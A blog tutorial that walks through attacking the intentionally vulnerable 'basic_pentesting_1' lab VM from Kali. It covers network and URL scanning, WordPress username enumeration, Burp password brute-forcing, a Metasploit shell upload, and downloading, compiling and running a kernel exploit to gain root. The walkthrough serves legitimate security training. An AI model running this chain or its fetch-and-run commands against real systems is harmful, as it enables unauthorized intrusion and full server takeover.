In this blog, we will download, run, and attack a vulnerable Linux OS using some built-in tools within Kali. We will also install a new tool (LES) and use it to learn about potential vulnerabilities against that vulnerable OS. A walkthrough accompanied with instructions is also provided in my youtube video, you can watch it at the end of the blog.
READINGS & TOOLS
SETUP
This VM (basic_pentesting_1.ova) [Link] is released in .ova format and tested with VirtualBox and can be imported into VMWare Workstation with no problems. To import this VM into VMWare right click on the sidebar and click open, navigate to the folder where the VM file is downloaded, and select it. The VMWare will automatically start the import and you will get an error saying that the VMWare did not pass the virtual hardware compliance checks. Just click the “Retry” button to ignore this test.
Once the VM is booted then change the network adapter to “NAT“. Right-click on the VM Name -> Settings -> Network Adapter -> Click NAT -> Save
We also need a Kali Linux VM for attacking purposes. Go to https://www.kali.org/get-kali/#kali-virtual-machines -> Download VMWare VM for Kali. The username and password for that VM is “kali“.
EXPLORING WEBSITES WITH DIRB
For now, we don’t know anything about the server. We don’t even know whether there is any website hosted on the server. So to scan websites on the server, log into the kali machine -> open terminal. Here “dirb” will be used for scanning the websites on the server.
“dirb” is a tool included with Kali, that performs brute-force URL scanning based on pre-assembled wordlists. You can read more about this tool here: https://tools.kali.org/web-applications/dirb
To use the “dirb”, we need to know the IP address of the machine. Bother machines, attacker and server are connected using NAT and VMware assigns IP addresses so that both machines are in the same network. We can find all machines in a network using another tool called “nmap” which actually finds which IP address is alive. So to use “nmap” we need to find the network address of the kali machine which we can do by running the following command.
ip addr
In my case, the IP address of the kali machine is 192.168.219.130/24. To find the IP address of the servers run the following command.
nmap 192.168.219.130/24The above commands iterate over every IP address in the network and check whether it is alive. We need to find that entry where HTTP is enabled.
In my case that IP address is 192.168.219.135. Copy your IP address and paste that into the browser, you should see a website. If it works then copy the link to the page and run the following command with your link.
dirb http://192.168.219.135Once the scan is complete of the above command, you should see the information of the server like the below image.
If we analyze the links “dirb” has scanned for us, we can see what the links look like from the WordPress website. The link we are interested in is http://192.168.219.135/secret/. Copy this kind of link and paste it into the browser, this will open a blogging website.
ATTACKING WORDPRESS
By looking at the dirb results you can see a link like <SERVER IP Address>/secret/wp-admin. If you go to this link you will find a login page for the blogging website. You can try different usernames and passwords.
WordPress has a long history of server-compromising vulnerabilities. You can see the list of those vulnerabilities at this link.
It has such a bad reputation, that a tool, wpscan, was created explicitly to scan for its vulnerabilities in running servers.
FIND USERNAME
We will use wpscan to find the username of the WordPress website. Run the following command to do that
wpscan --url http://192.168.219.135/secret/ --enumerate uAnalyze the output of the above command you will find a line where it says “User(s) Identified:”. After this line you will a username. You can see in the image below that this username is “admin”.
You can get back to the browser where the login page of this website is opened and try to log in with this username. You will notice that the error message is changed for the login and this error message confirms that the username is correct but not the password.
FIND PASSWORD
To find the password of this website we will use another tool called burp suit. Open Burpsuite -> Go with temporary project and click next -> Go with defaults and click “start Burp” -> Go to Proxy Tab -> Click “Intercept is On” -> Click “Open Browser”
In the newly opened browser open the login page of the website. Once it is done go back to burp and click “Intercept is off”. Then go back to the browser and try to log in with a previously known username and random password. Go back to burp and you will see the result like the following Image.
Right-click on this result -> Send to Repeater -> Go to repeater Tab. You will see the result in the repeater tab now. You can change the password of the request by changing the text in the argument of “pwd” and trying different passwords to find the correct password. We will use an automated and more elegant method to find the IP Address. So to do that right click -> send to intruder -> Go to intruder tab. You will see the following window.
Look at all the orange lines in the image. We will select every orange line except the orange line which is in the front of “pwd=”. We will click the clear button after selecting every orange line. By doing so we are telling burp that we need to fix values in every other part of the form except the password.
Now go to payloads tab -> Click load button under Payload Options -> Go to /usr/share/wordlists and open fasttrack.txt file. You should see different text loaded.
Now click on the “start attack” button. Once the process is complete. You should see that burp studio have checked every password against the admin username. Sort the result by clicking on status, and selecting that password where the status is 302. In my case, that password is also “admin”.
You can check this password in the browser.
ACCESS SERVER
Most hackers would stop here and change the content of the WordPress website. But we will hack the server where WordPress is running so we can do whatever we want whenever we want.
Go to the terminal and run the following commands
msfconsole
search wordpress
use exploit/unix/webapp/wp_admin_shell_upload
show options
set PASSWORD admin
set USERNAME admin
set RHOSTS 192.168.219.135
set TARGETURI /secret
exploit
shell
whoami
Once you run the exploit command above, you get access to the server. “shell” command opens the shell on the server and when you run the “whoami”, it shows the username with which you are using the server.
We can access the bash by running the following command.
python -c "import pty; pty.spawn("/bin/bash")'Navigate to /tmp directory using the following command.
cd /tmp
ls -lWe will use Linux Exploit Suggestor (Link). Run the following commands.
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
chmod +x les.sh
./les.shIt will download “les.sh” file and make it executable. The third command will run this tool.
This will suggest a number of tools that can be used. We will use the eBPF_verifier tool. To use this tool copy the download URL of this tool and run the following command
wget <copied download link>
mv 45010 45.c
gcc 45.c
./a.outWhen we complete running all the commands above, this tool we downloaded will automatically give us the root access. You can verify it by running “whoami” command. You can change the root password of the machine so you can ssh into the machine with that password and username. To do that run the following command.
passwd rootVIDEO TUTORIAL
ABOUT ME
I’m Usama Imdad, a full-stack developer / AI engineer. I write technology-related blogs occasionally. I hope you enjoyed reading this article! If you liked the blog and learned anything new today, share this post with friends. If you have any questions or suggestions, drop a comment. I will try as soon as possible to answer your queries.
You can find more info about me on my website, LinkedIn or Twitter.